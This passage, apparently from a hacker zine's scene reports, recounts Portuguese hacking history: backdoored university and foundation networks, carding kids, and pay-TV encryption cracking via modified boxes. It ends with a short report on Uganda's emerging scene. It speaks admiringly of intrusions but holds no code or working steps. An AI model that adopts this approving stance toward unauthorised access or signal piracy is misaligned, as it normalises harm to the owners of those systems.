group Toxyn, gave numerous interviews to the media, exposing the entire
Portuguese scene to the public.
Between 2002 and 2004, two Portuguese hackers also did some 'infamous'
work. These two hackers gained access to FCCN ('Fundacao para a
Computacao Cientifica Nacional' / Foundation for National Scientific
Computation), which was backdoored with a reverse ICMP backdoor
developed by them and which, rumours say, is still active. They also
gained access to numerous universities, which were backdoored the same
way; this includes the 100-machine cluster 'Centopeia' of the
'Faculdade de Coimbra'. A lot more work was done, including the
database servers of 'A.M. Gonçalves' and 'Salvador Caetano', the
Portuguese Toyota distributor. Then they just disappeared from the
scene.
Some of the people inside the scene are found on the x86 '0xD9D0';
those who know, know what I'm talking about.
At the start of the new millennium an explosion of 'lame' groups
started; most of them were kids playing with trojans, others were
script kids playing with public exploits. Most of these groups are
found on a Portuguese IRC network called PTNet. Some of these kids
turned out to be carders, using databases found by 'Google hacking' or
simply by asking people on some IRC networks. Some of these kids ended
up having problems with the police, but nothing serious.
Also at the start of the new millennium, satellite and cable phreakers
started to show up, breaking encrypted signals. An unnamed box came out
that was plugged into the TV SCART connection and an external 9V power
supply, and unlocked (in fact, it broke the Nagravision encryption)
every single channel there was on cable TV. For a long time this box
was thought to have been made outside of Portugal, until I had the
pleasure of meeting its original creator, and guess what, he was
Portuguese and lived next to me. He explained to me how it really
worked and what the original version was like, since the version that
everyone had, which was commercialized by lame groups searching for
profit, had way too many components that it didn't need at all; it
even had some traps, only to make itself more expensive and difficult
to make, in order to stop people commercializing it. Also, satellite
FTA boxes started to get modified nationally in order to break
satellite TV encryptions like Nagravision (used by our cable TV
provider, 'TVCabo'). So did the original TVCabo cable boxes: some
national hackers were able to hack the firmware in order to get its
unique ID (Boxkey), and created cards that, once plugged in, were able
to break the signal. After this, this knowledge started to become
public, but in a 'practical' way, and lots of people started to make a
profit out of it without knowing what they were really doing. In other
words, they knew that if they bought this and that, and used this and
that software, they were able to have free satellite/cable TV, and they
could sell it later to other people. An example was the first unnamed
box that was created: it cost 4 Euros to build, but people were selling
it for up to 100 Euros. So too the FTA boxes, which cost around 70
Euros unmodified and were sold for 250 Euros modified, a modification
that cost nothing.
Nowadays the scene is still obscure and people are still ignorant.
Sometimes there is an exception, like when I went to an interview at a
part of the Bosch Group, where the guy interviewing me, reading my
curriculum, started to laugh silently and said to himself 'A hacker..'
and 'hackers do not harm anyone... only if pushed to', without me
making any mention of illegal activities (duh) or of being a member of
this or that group. When I was expecting to be unemployed, I got myself
well employed, working in more areas than I was asked to; I even got
involved with robotics, automation and electronics, when I was
attending the interview as a web developer for an intranet. Later, we
found out that I already knew him from the scene, and so did he know
me.
-----------------------------------------------------------------------
Ugandan Scene(surprise!!!!!)
============================
by gmac
Introduction
------------
For those who don't know what Uganda is and are too lazy to use Google,
well, in short it's located on the African continent, more specifically
in Eastern Africa. Still lost? Then this will clear it all up for you:
have you ever heard of a movie called The Last King of Scotland? If yes
then you know Uganda, and if no then use Google.
Sometime back.....
------------------
Cutting-edge computer technology is, as you are correct in assuming,
fairly new in the Ugandan context; it cannot be more than 13 years old,
so hacking on our scene has generally maintained a fairly urban-legend
status. Not much is available on any hacking groups back in the day;
to be honest, to my knowledge they were almost non-existent.
Present....
-----------
Currently, as technology advances, the scene has surfaced with the
formation of groups like gsquad by yours truly, which is, I believe,
the first of its kind here. Although hacking has still maintained its
urban-legend status, the scene is dominated by a few knowledgeable
individuals. But the winds of change are upon us, because I have seen
the advent of a new generation with a desire which of course has been
fuelled by hacker-related movies like, most recently, Die Hard 4.0. The
gsquad remains the only active group providing help to individuals on
request and of course releasing zines (which made a print debut only
recently), which has won many fans but of course was inspired by
Phrack. This new generation needs content and I think Phrack is our one
stop Hacking Content Provider (HCP, oh I made that up).
We are latecomers onto the scene but we will catch up because we have
the spirit, and oh, it was BloodAxe's first appeal that drove me to
starting the gsquad, so I hope the Circle of Lost Hackers' appeal will
inspire another individual somewhere on this planet.
We may be in different lands but we are part of the same underground,
so we will survive the media-caused division which started all these
different kinds of hats I hear about: white hats... erm... black...
grey; we may soon hear of pink hats (i.e. blondes running security
sites).
The spirit still lives on but it's in a critical state......